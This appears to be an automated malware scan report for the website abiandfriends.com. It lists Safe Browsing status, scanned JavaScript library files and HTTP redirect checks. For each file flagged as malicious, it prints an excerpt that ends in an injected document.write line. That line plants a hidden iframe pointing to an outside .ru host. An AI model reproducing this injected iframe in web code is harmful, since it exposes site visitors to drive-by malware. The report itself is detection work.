Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=abiandfriends.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://abiandfriends.com/ | 200 OK Content-Length: 18574 Content-Type: text/html | clean |
http://abiandfriends.com/./includes/prototype/prototype.js | 200 OK Content-Length: 124296 Content-Type: application/javascript | clean |
http://abiandfriends.com/./includes/script.aculo.us/src/scriptaculous.js?load=effects | 200 OK Content-Length: 2814 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Scriptaculous = { Version: '1.8.0', require: function(libraryName) { document.write('<script type="text/javascript" src="'+libraryName+'"><\/script>'); }, REQUIRED_PROTOTYPE: '1.6.0', load: function() { function convertVersionString(versionString){ var r = versionString.split('.'); return parseInt(r[0])*100000 + parseInt(r[1])*1000 + parseInt(r[2]); } if((typeof Prototype=='undefined') || var includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider,sound').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load();document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/starbox/js/starbox.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Starboxes = { inverse: false, locked: false, onRate: Prototype.emptyFunction, overlayImages: '../images/starbox/', overlay: 'default.png', rerate: false, REQUIRED_Prototype: '1.6.0', REQUIRED_Scriptaculous: '1.8.0', load: function() { this.require('Prototype'); var srcMatch = /starbox\.js$/; this.imageSource = (($$("head script[src]").find(function(s) { return s.src if (this.options.ghosting) { this.ghost = this.wrapper.appendChild(new Element('div', { 'class': 'ghost' }).setStyle(styles.absolute)); if (this.options.ghostColor) this.ghost.setStyle({ background: this.options.ghostColor }); ;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/tooltip.js | 200 OK Content-Length: 1909 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var DH = 0;var an = 0;var al = 0;var ai = 0;if (document.getElementById) {ai = 1; DH = 1;}else {if (document.all) {al = 1; DH = 1;} else { browserVersion = parseInt(navigator.appVersion); if ((navigator.appName.indexOf('Netscape') != -1) && (browserVersion == 4)) {an = 1; DH = 1;}}} function fd(oi, wS) {if (ai) return wS ? document.getElementById(oi).style:document.getElementById(oi); if (al) return wS ? document.all[oi].style: document.all[oi]; if (an) return document.layers[oi];} ;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/jquery1.2.6.js | 200 OK Content-Length: 49141 Content-Type: application/javascript | clean |
http://abiandfriends.com/./includes/thickbox.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | clean |
http://abiandfriends.com/./includes/jquery/core.js | 200 OK Content-Length: 37932 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if ( window.jQuery ) var _jQuery = window.jQuery; var jQuery = window.jQuery = function( selector, context ) { return new jQuery.prototype.init( selector, context ); }; if ( window.$ ) var _$ = window.$; window.$ = jQuery; var quickExpr = /^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/; var isSimple = /^.[^:#\[\.]*$/; jQuery.fn = jQuery.prototype = { init: function( selector, context ) { selector = selector || document; if ( s Math.max(document.body["offset" + name], document.documentElement["offset" + name]) ) : size == undefined ? (this.length ? jQuery.css( this[0], type ) : null) : this.css( type, size.constructor == String ? size : size + "px" ); }; }); ;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/jquery/selector.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | clean |
http://abiandfriends.com/./includes/jquery/event.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | clean |
http://abiandfriends.com/./includes/jquery/ajax.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.fn.extend({ load: function( url, params, callback ) { if ( jQuery.isFunction( url ) ) return this.bind("load", url); var off = url.indexOf(" "); if ( off >= 0 ) { var selector = url.slice(off, url.length); url = url.slice(0, off); } callback = callback || function(){}; var type = "GET"; if ( params ) if ( jQuery.isFunction( params ) ) { callback = params; params = null; } els if ( s.global ) jQuery.event.trigger("ajaxSend", [xml, s]); var onreadystatechange = function(isTimeout){ if ( !requestDone && xml && (xml.readyState == 4 || isTimeout == "timeout") ) { requestDone = true; if (ival) { clearInterv;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/jquery/fx.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.fn.extend({ show: function(speed,callback){ return speed ? this.animate({ height: "show", width: "show", opacity: "show" }, speed, callback) : this.filter(":hidden").each(function(){ this.style.display = this.oldblock || ""; if ( jQuery.css(this,"display") == "none" ) { var elem = jQuery("<" + this.tagName + " />").appendTo("body"); this.style.display = elem.css("display"); elem.remove(); this.options.show = true; this.custom(0, this.cur()); if ( this.prop == "width" || this.prop == "height" ) this.elem.style[this.prop] = "1px"; jQuery(this.elem).show(); }, hide: function(){ this.;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/i/iutil.js | 200 OK Content-Length: 6994 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.iUtil = { getPosition : function(e, forceIt) { var x = 0; var y = 0; var es = e.style; var restoreStyles = false; if (forceIt && jQuery.curCSS(e,'display') == 'none') { var oldVisibility = es.visibility; var oldPosition = es.position; restoreStyles = true; es.visibility = 'hidden'; es.display = 'block'; es.position = 'absolute'; } var el = e; if (el.getBoundingClientRect) { var b }); } }; [].indexOf || (Array.prototype.indexOf = function(v, n){ n = (n == null) ? 0 : n; var m = this.length; for (var i=n; i<m; i++) if (this[i] == v) return i; return -1; }); ;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/i/idrag.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.iDrag = { helper : null, dragged: null, destroy : function() { return this.each( function () { if (this.isDraggable) { this.dragCfg.dhe.unbind('mousedown', jQuery.iDrag.draginit); this.dragCfg = null; this.isDraggable = false; if(jQuery.browser.msie) { this.unselectable = "off"; } else { this.style.MozUserSelect = ''; this.style.KhtmlUserSelect = ''; this.st if (elm.dragCfg.insideParent || elm.dragCfg.containment == 'parent') { parentBorders = jQuery.iUtil.getBorder(elm.parentNode, true); elm.dragCfg.oC.x = elm.offsetLeft + (jQuery.browser.msie ? 0 : jQuery.browser.opera ? -parentBorders.l : parentBorders.l); elm.drag;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/i/accordion.js | 200 OK Content-Length: 4693 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ENSE.txt) * and GPL (GPL-LICENSE.txt) licenses. * */ jQuery.iAccordion = { build : function(options) { return this.each( function() { if (!options.headerSelector || !options.panelSelector) return; var el = this; el.accordionCfg = { panelHeight : options.panelHeight||300, headerSelector : options.headerSelector, panelSelector : options.panelSelector, activeClass : options.a } ) .eq(0) .addClass(el.accordionCfg.activeClass) .end(); jQuery(this) .css('height', jQuery(this).css('height')) .css('overflow', 'hidden'); } ); } }; jQuery.fn.Accordion = jQuery.iAccordion.build;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: abiandfriends.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 19:43:33 GMT
Pragma: no-cache
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: User-Agent,Accept-Encoding
Content-Length: 18574
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=kigg0bose6bgjcbj75msociaf7; path=/
X-Powered-By: PHP/5.4.34
...18574 bytes of data.
GET / HTTP/1.1
Host: abiandfriends.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 19:43:33 GMT
Pragma: no-cache
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: User-Agent,Accept-Encoding
Content-Length: 18574
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=kigg0bose6bgjcbj75msociaf7; path=/
X-Powered-By: PHP/5.4.34
...18574 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: abiandfriends.com
Referer: http://www.google.com/search?q=abiandfriends.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: abiandfriends.com
Referer: http://www.google.com/search?q=abiandfriends.com
Result:
The result is similar to the first query. There are no suspicious redirects found.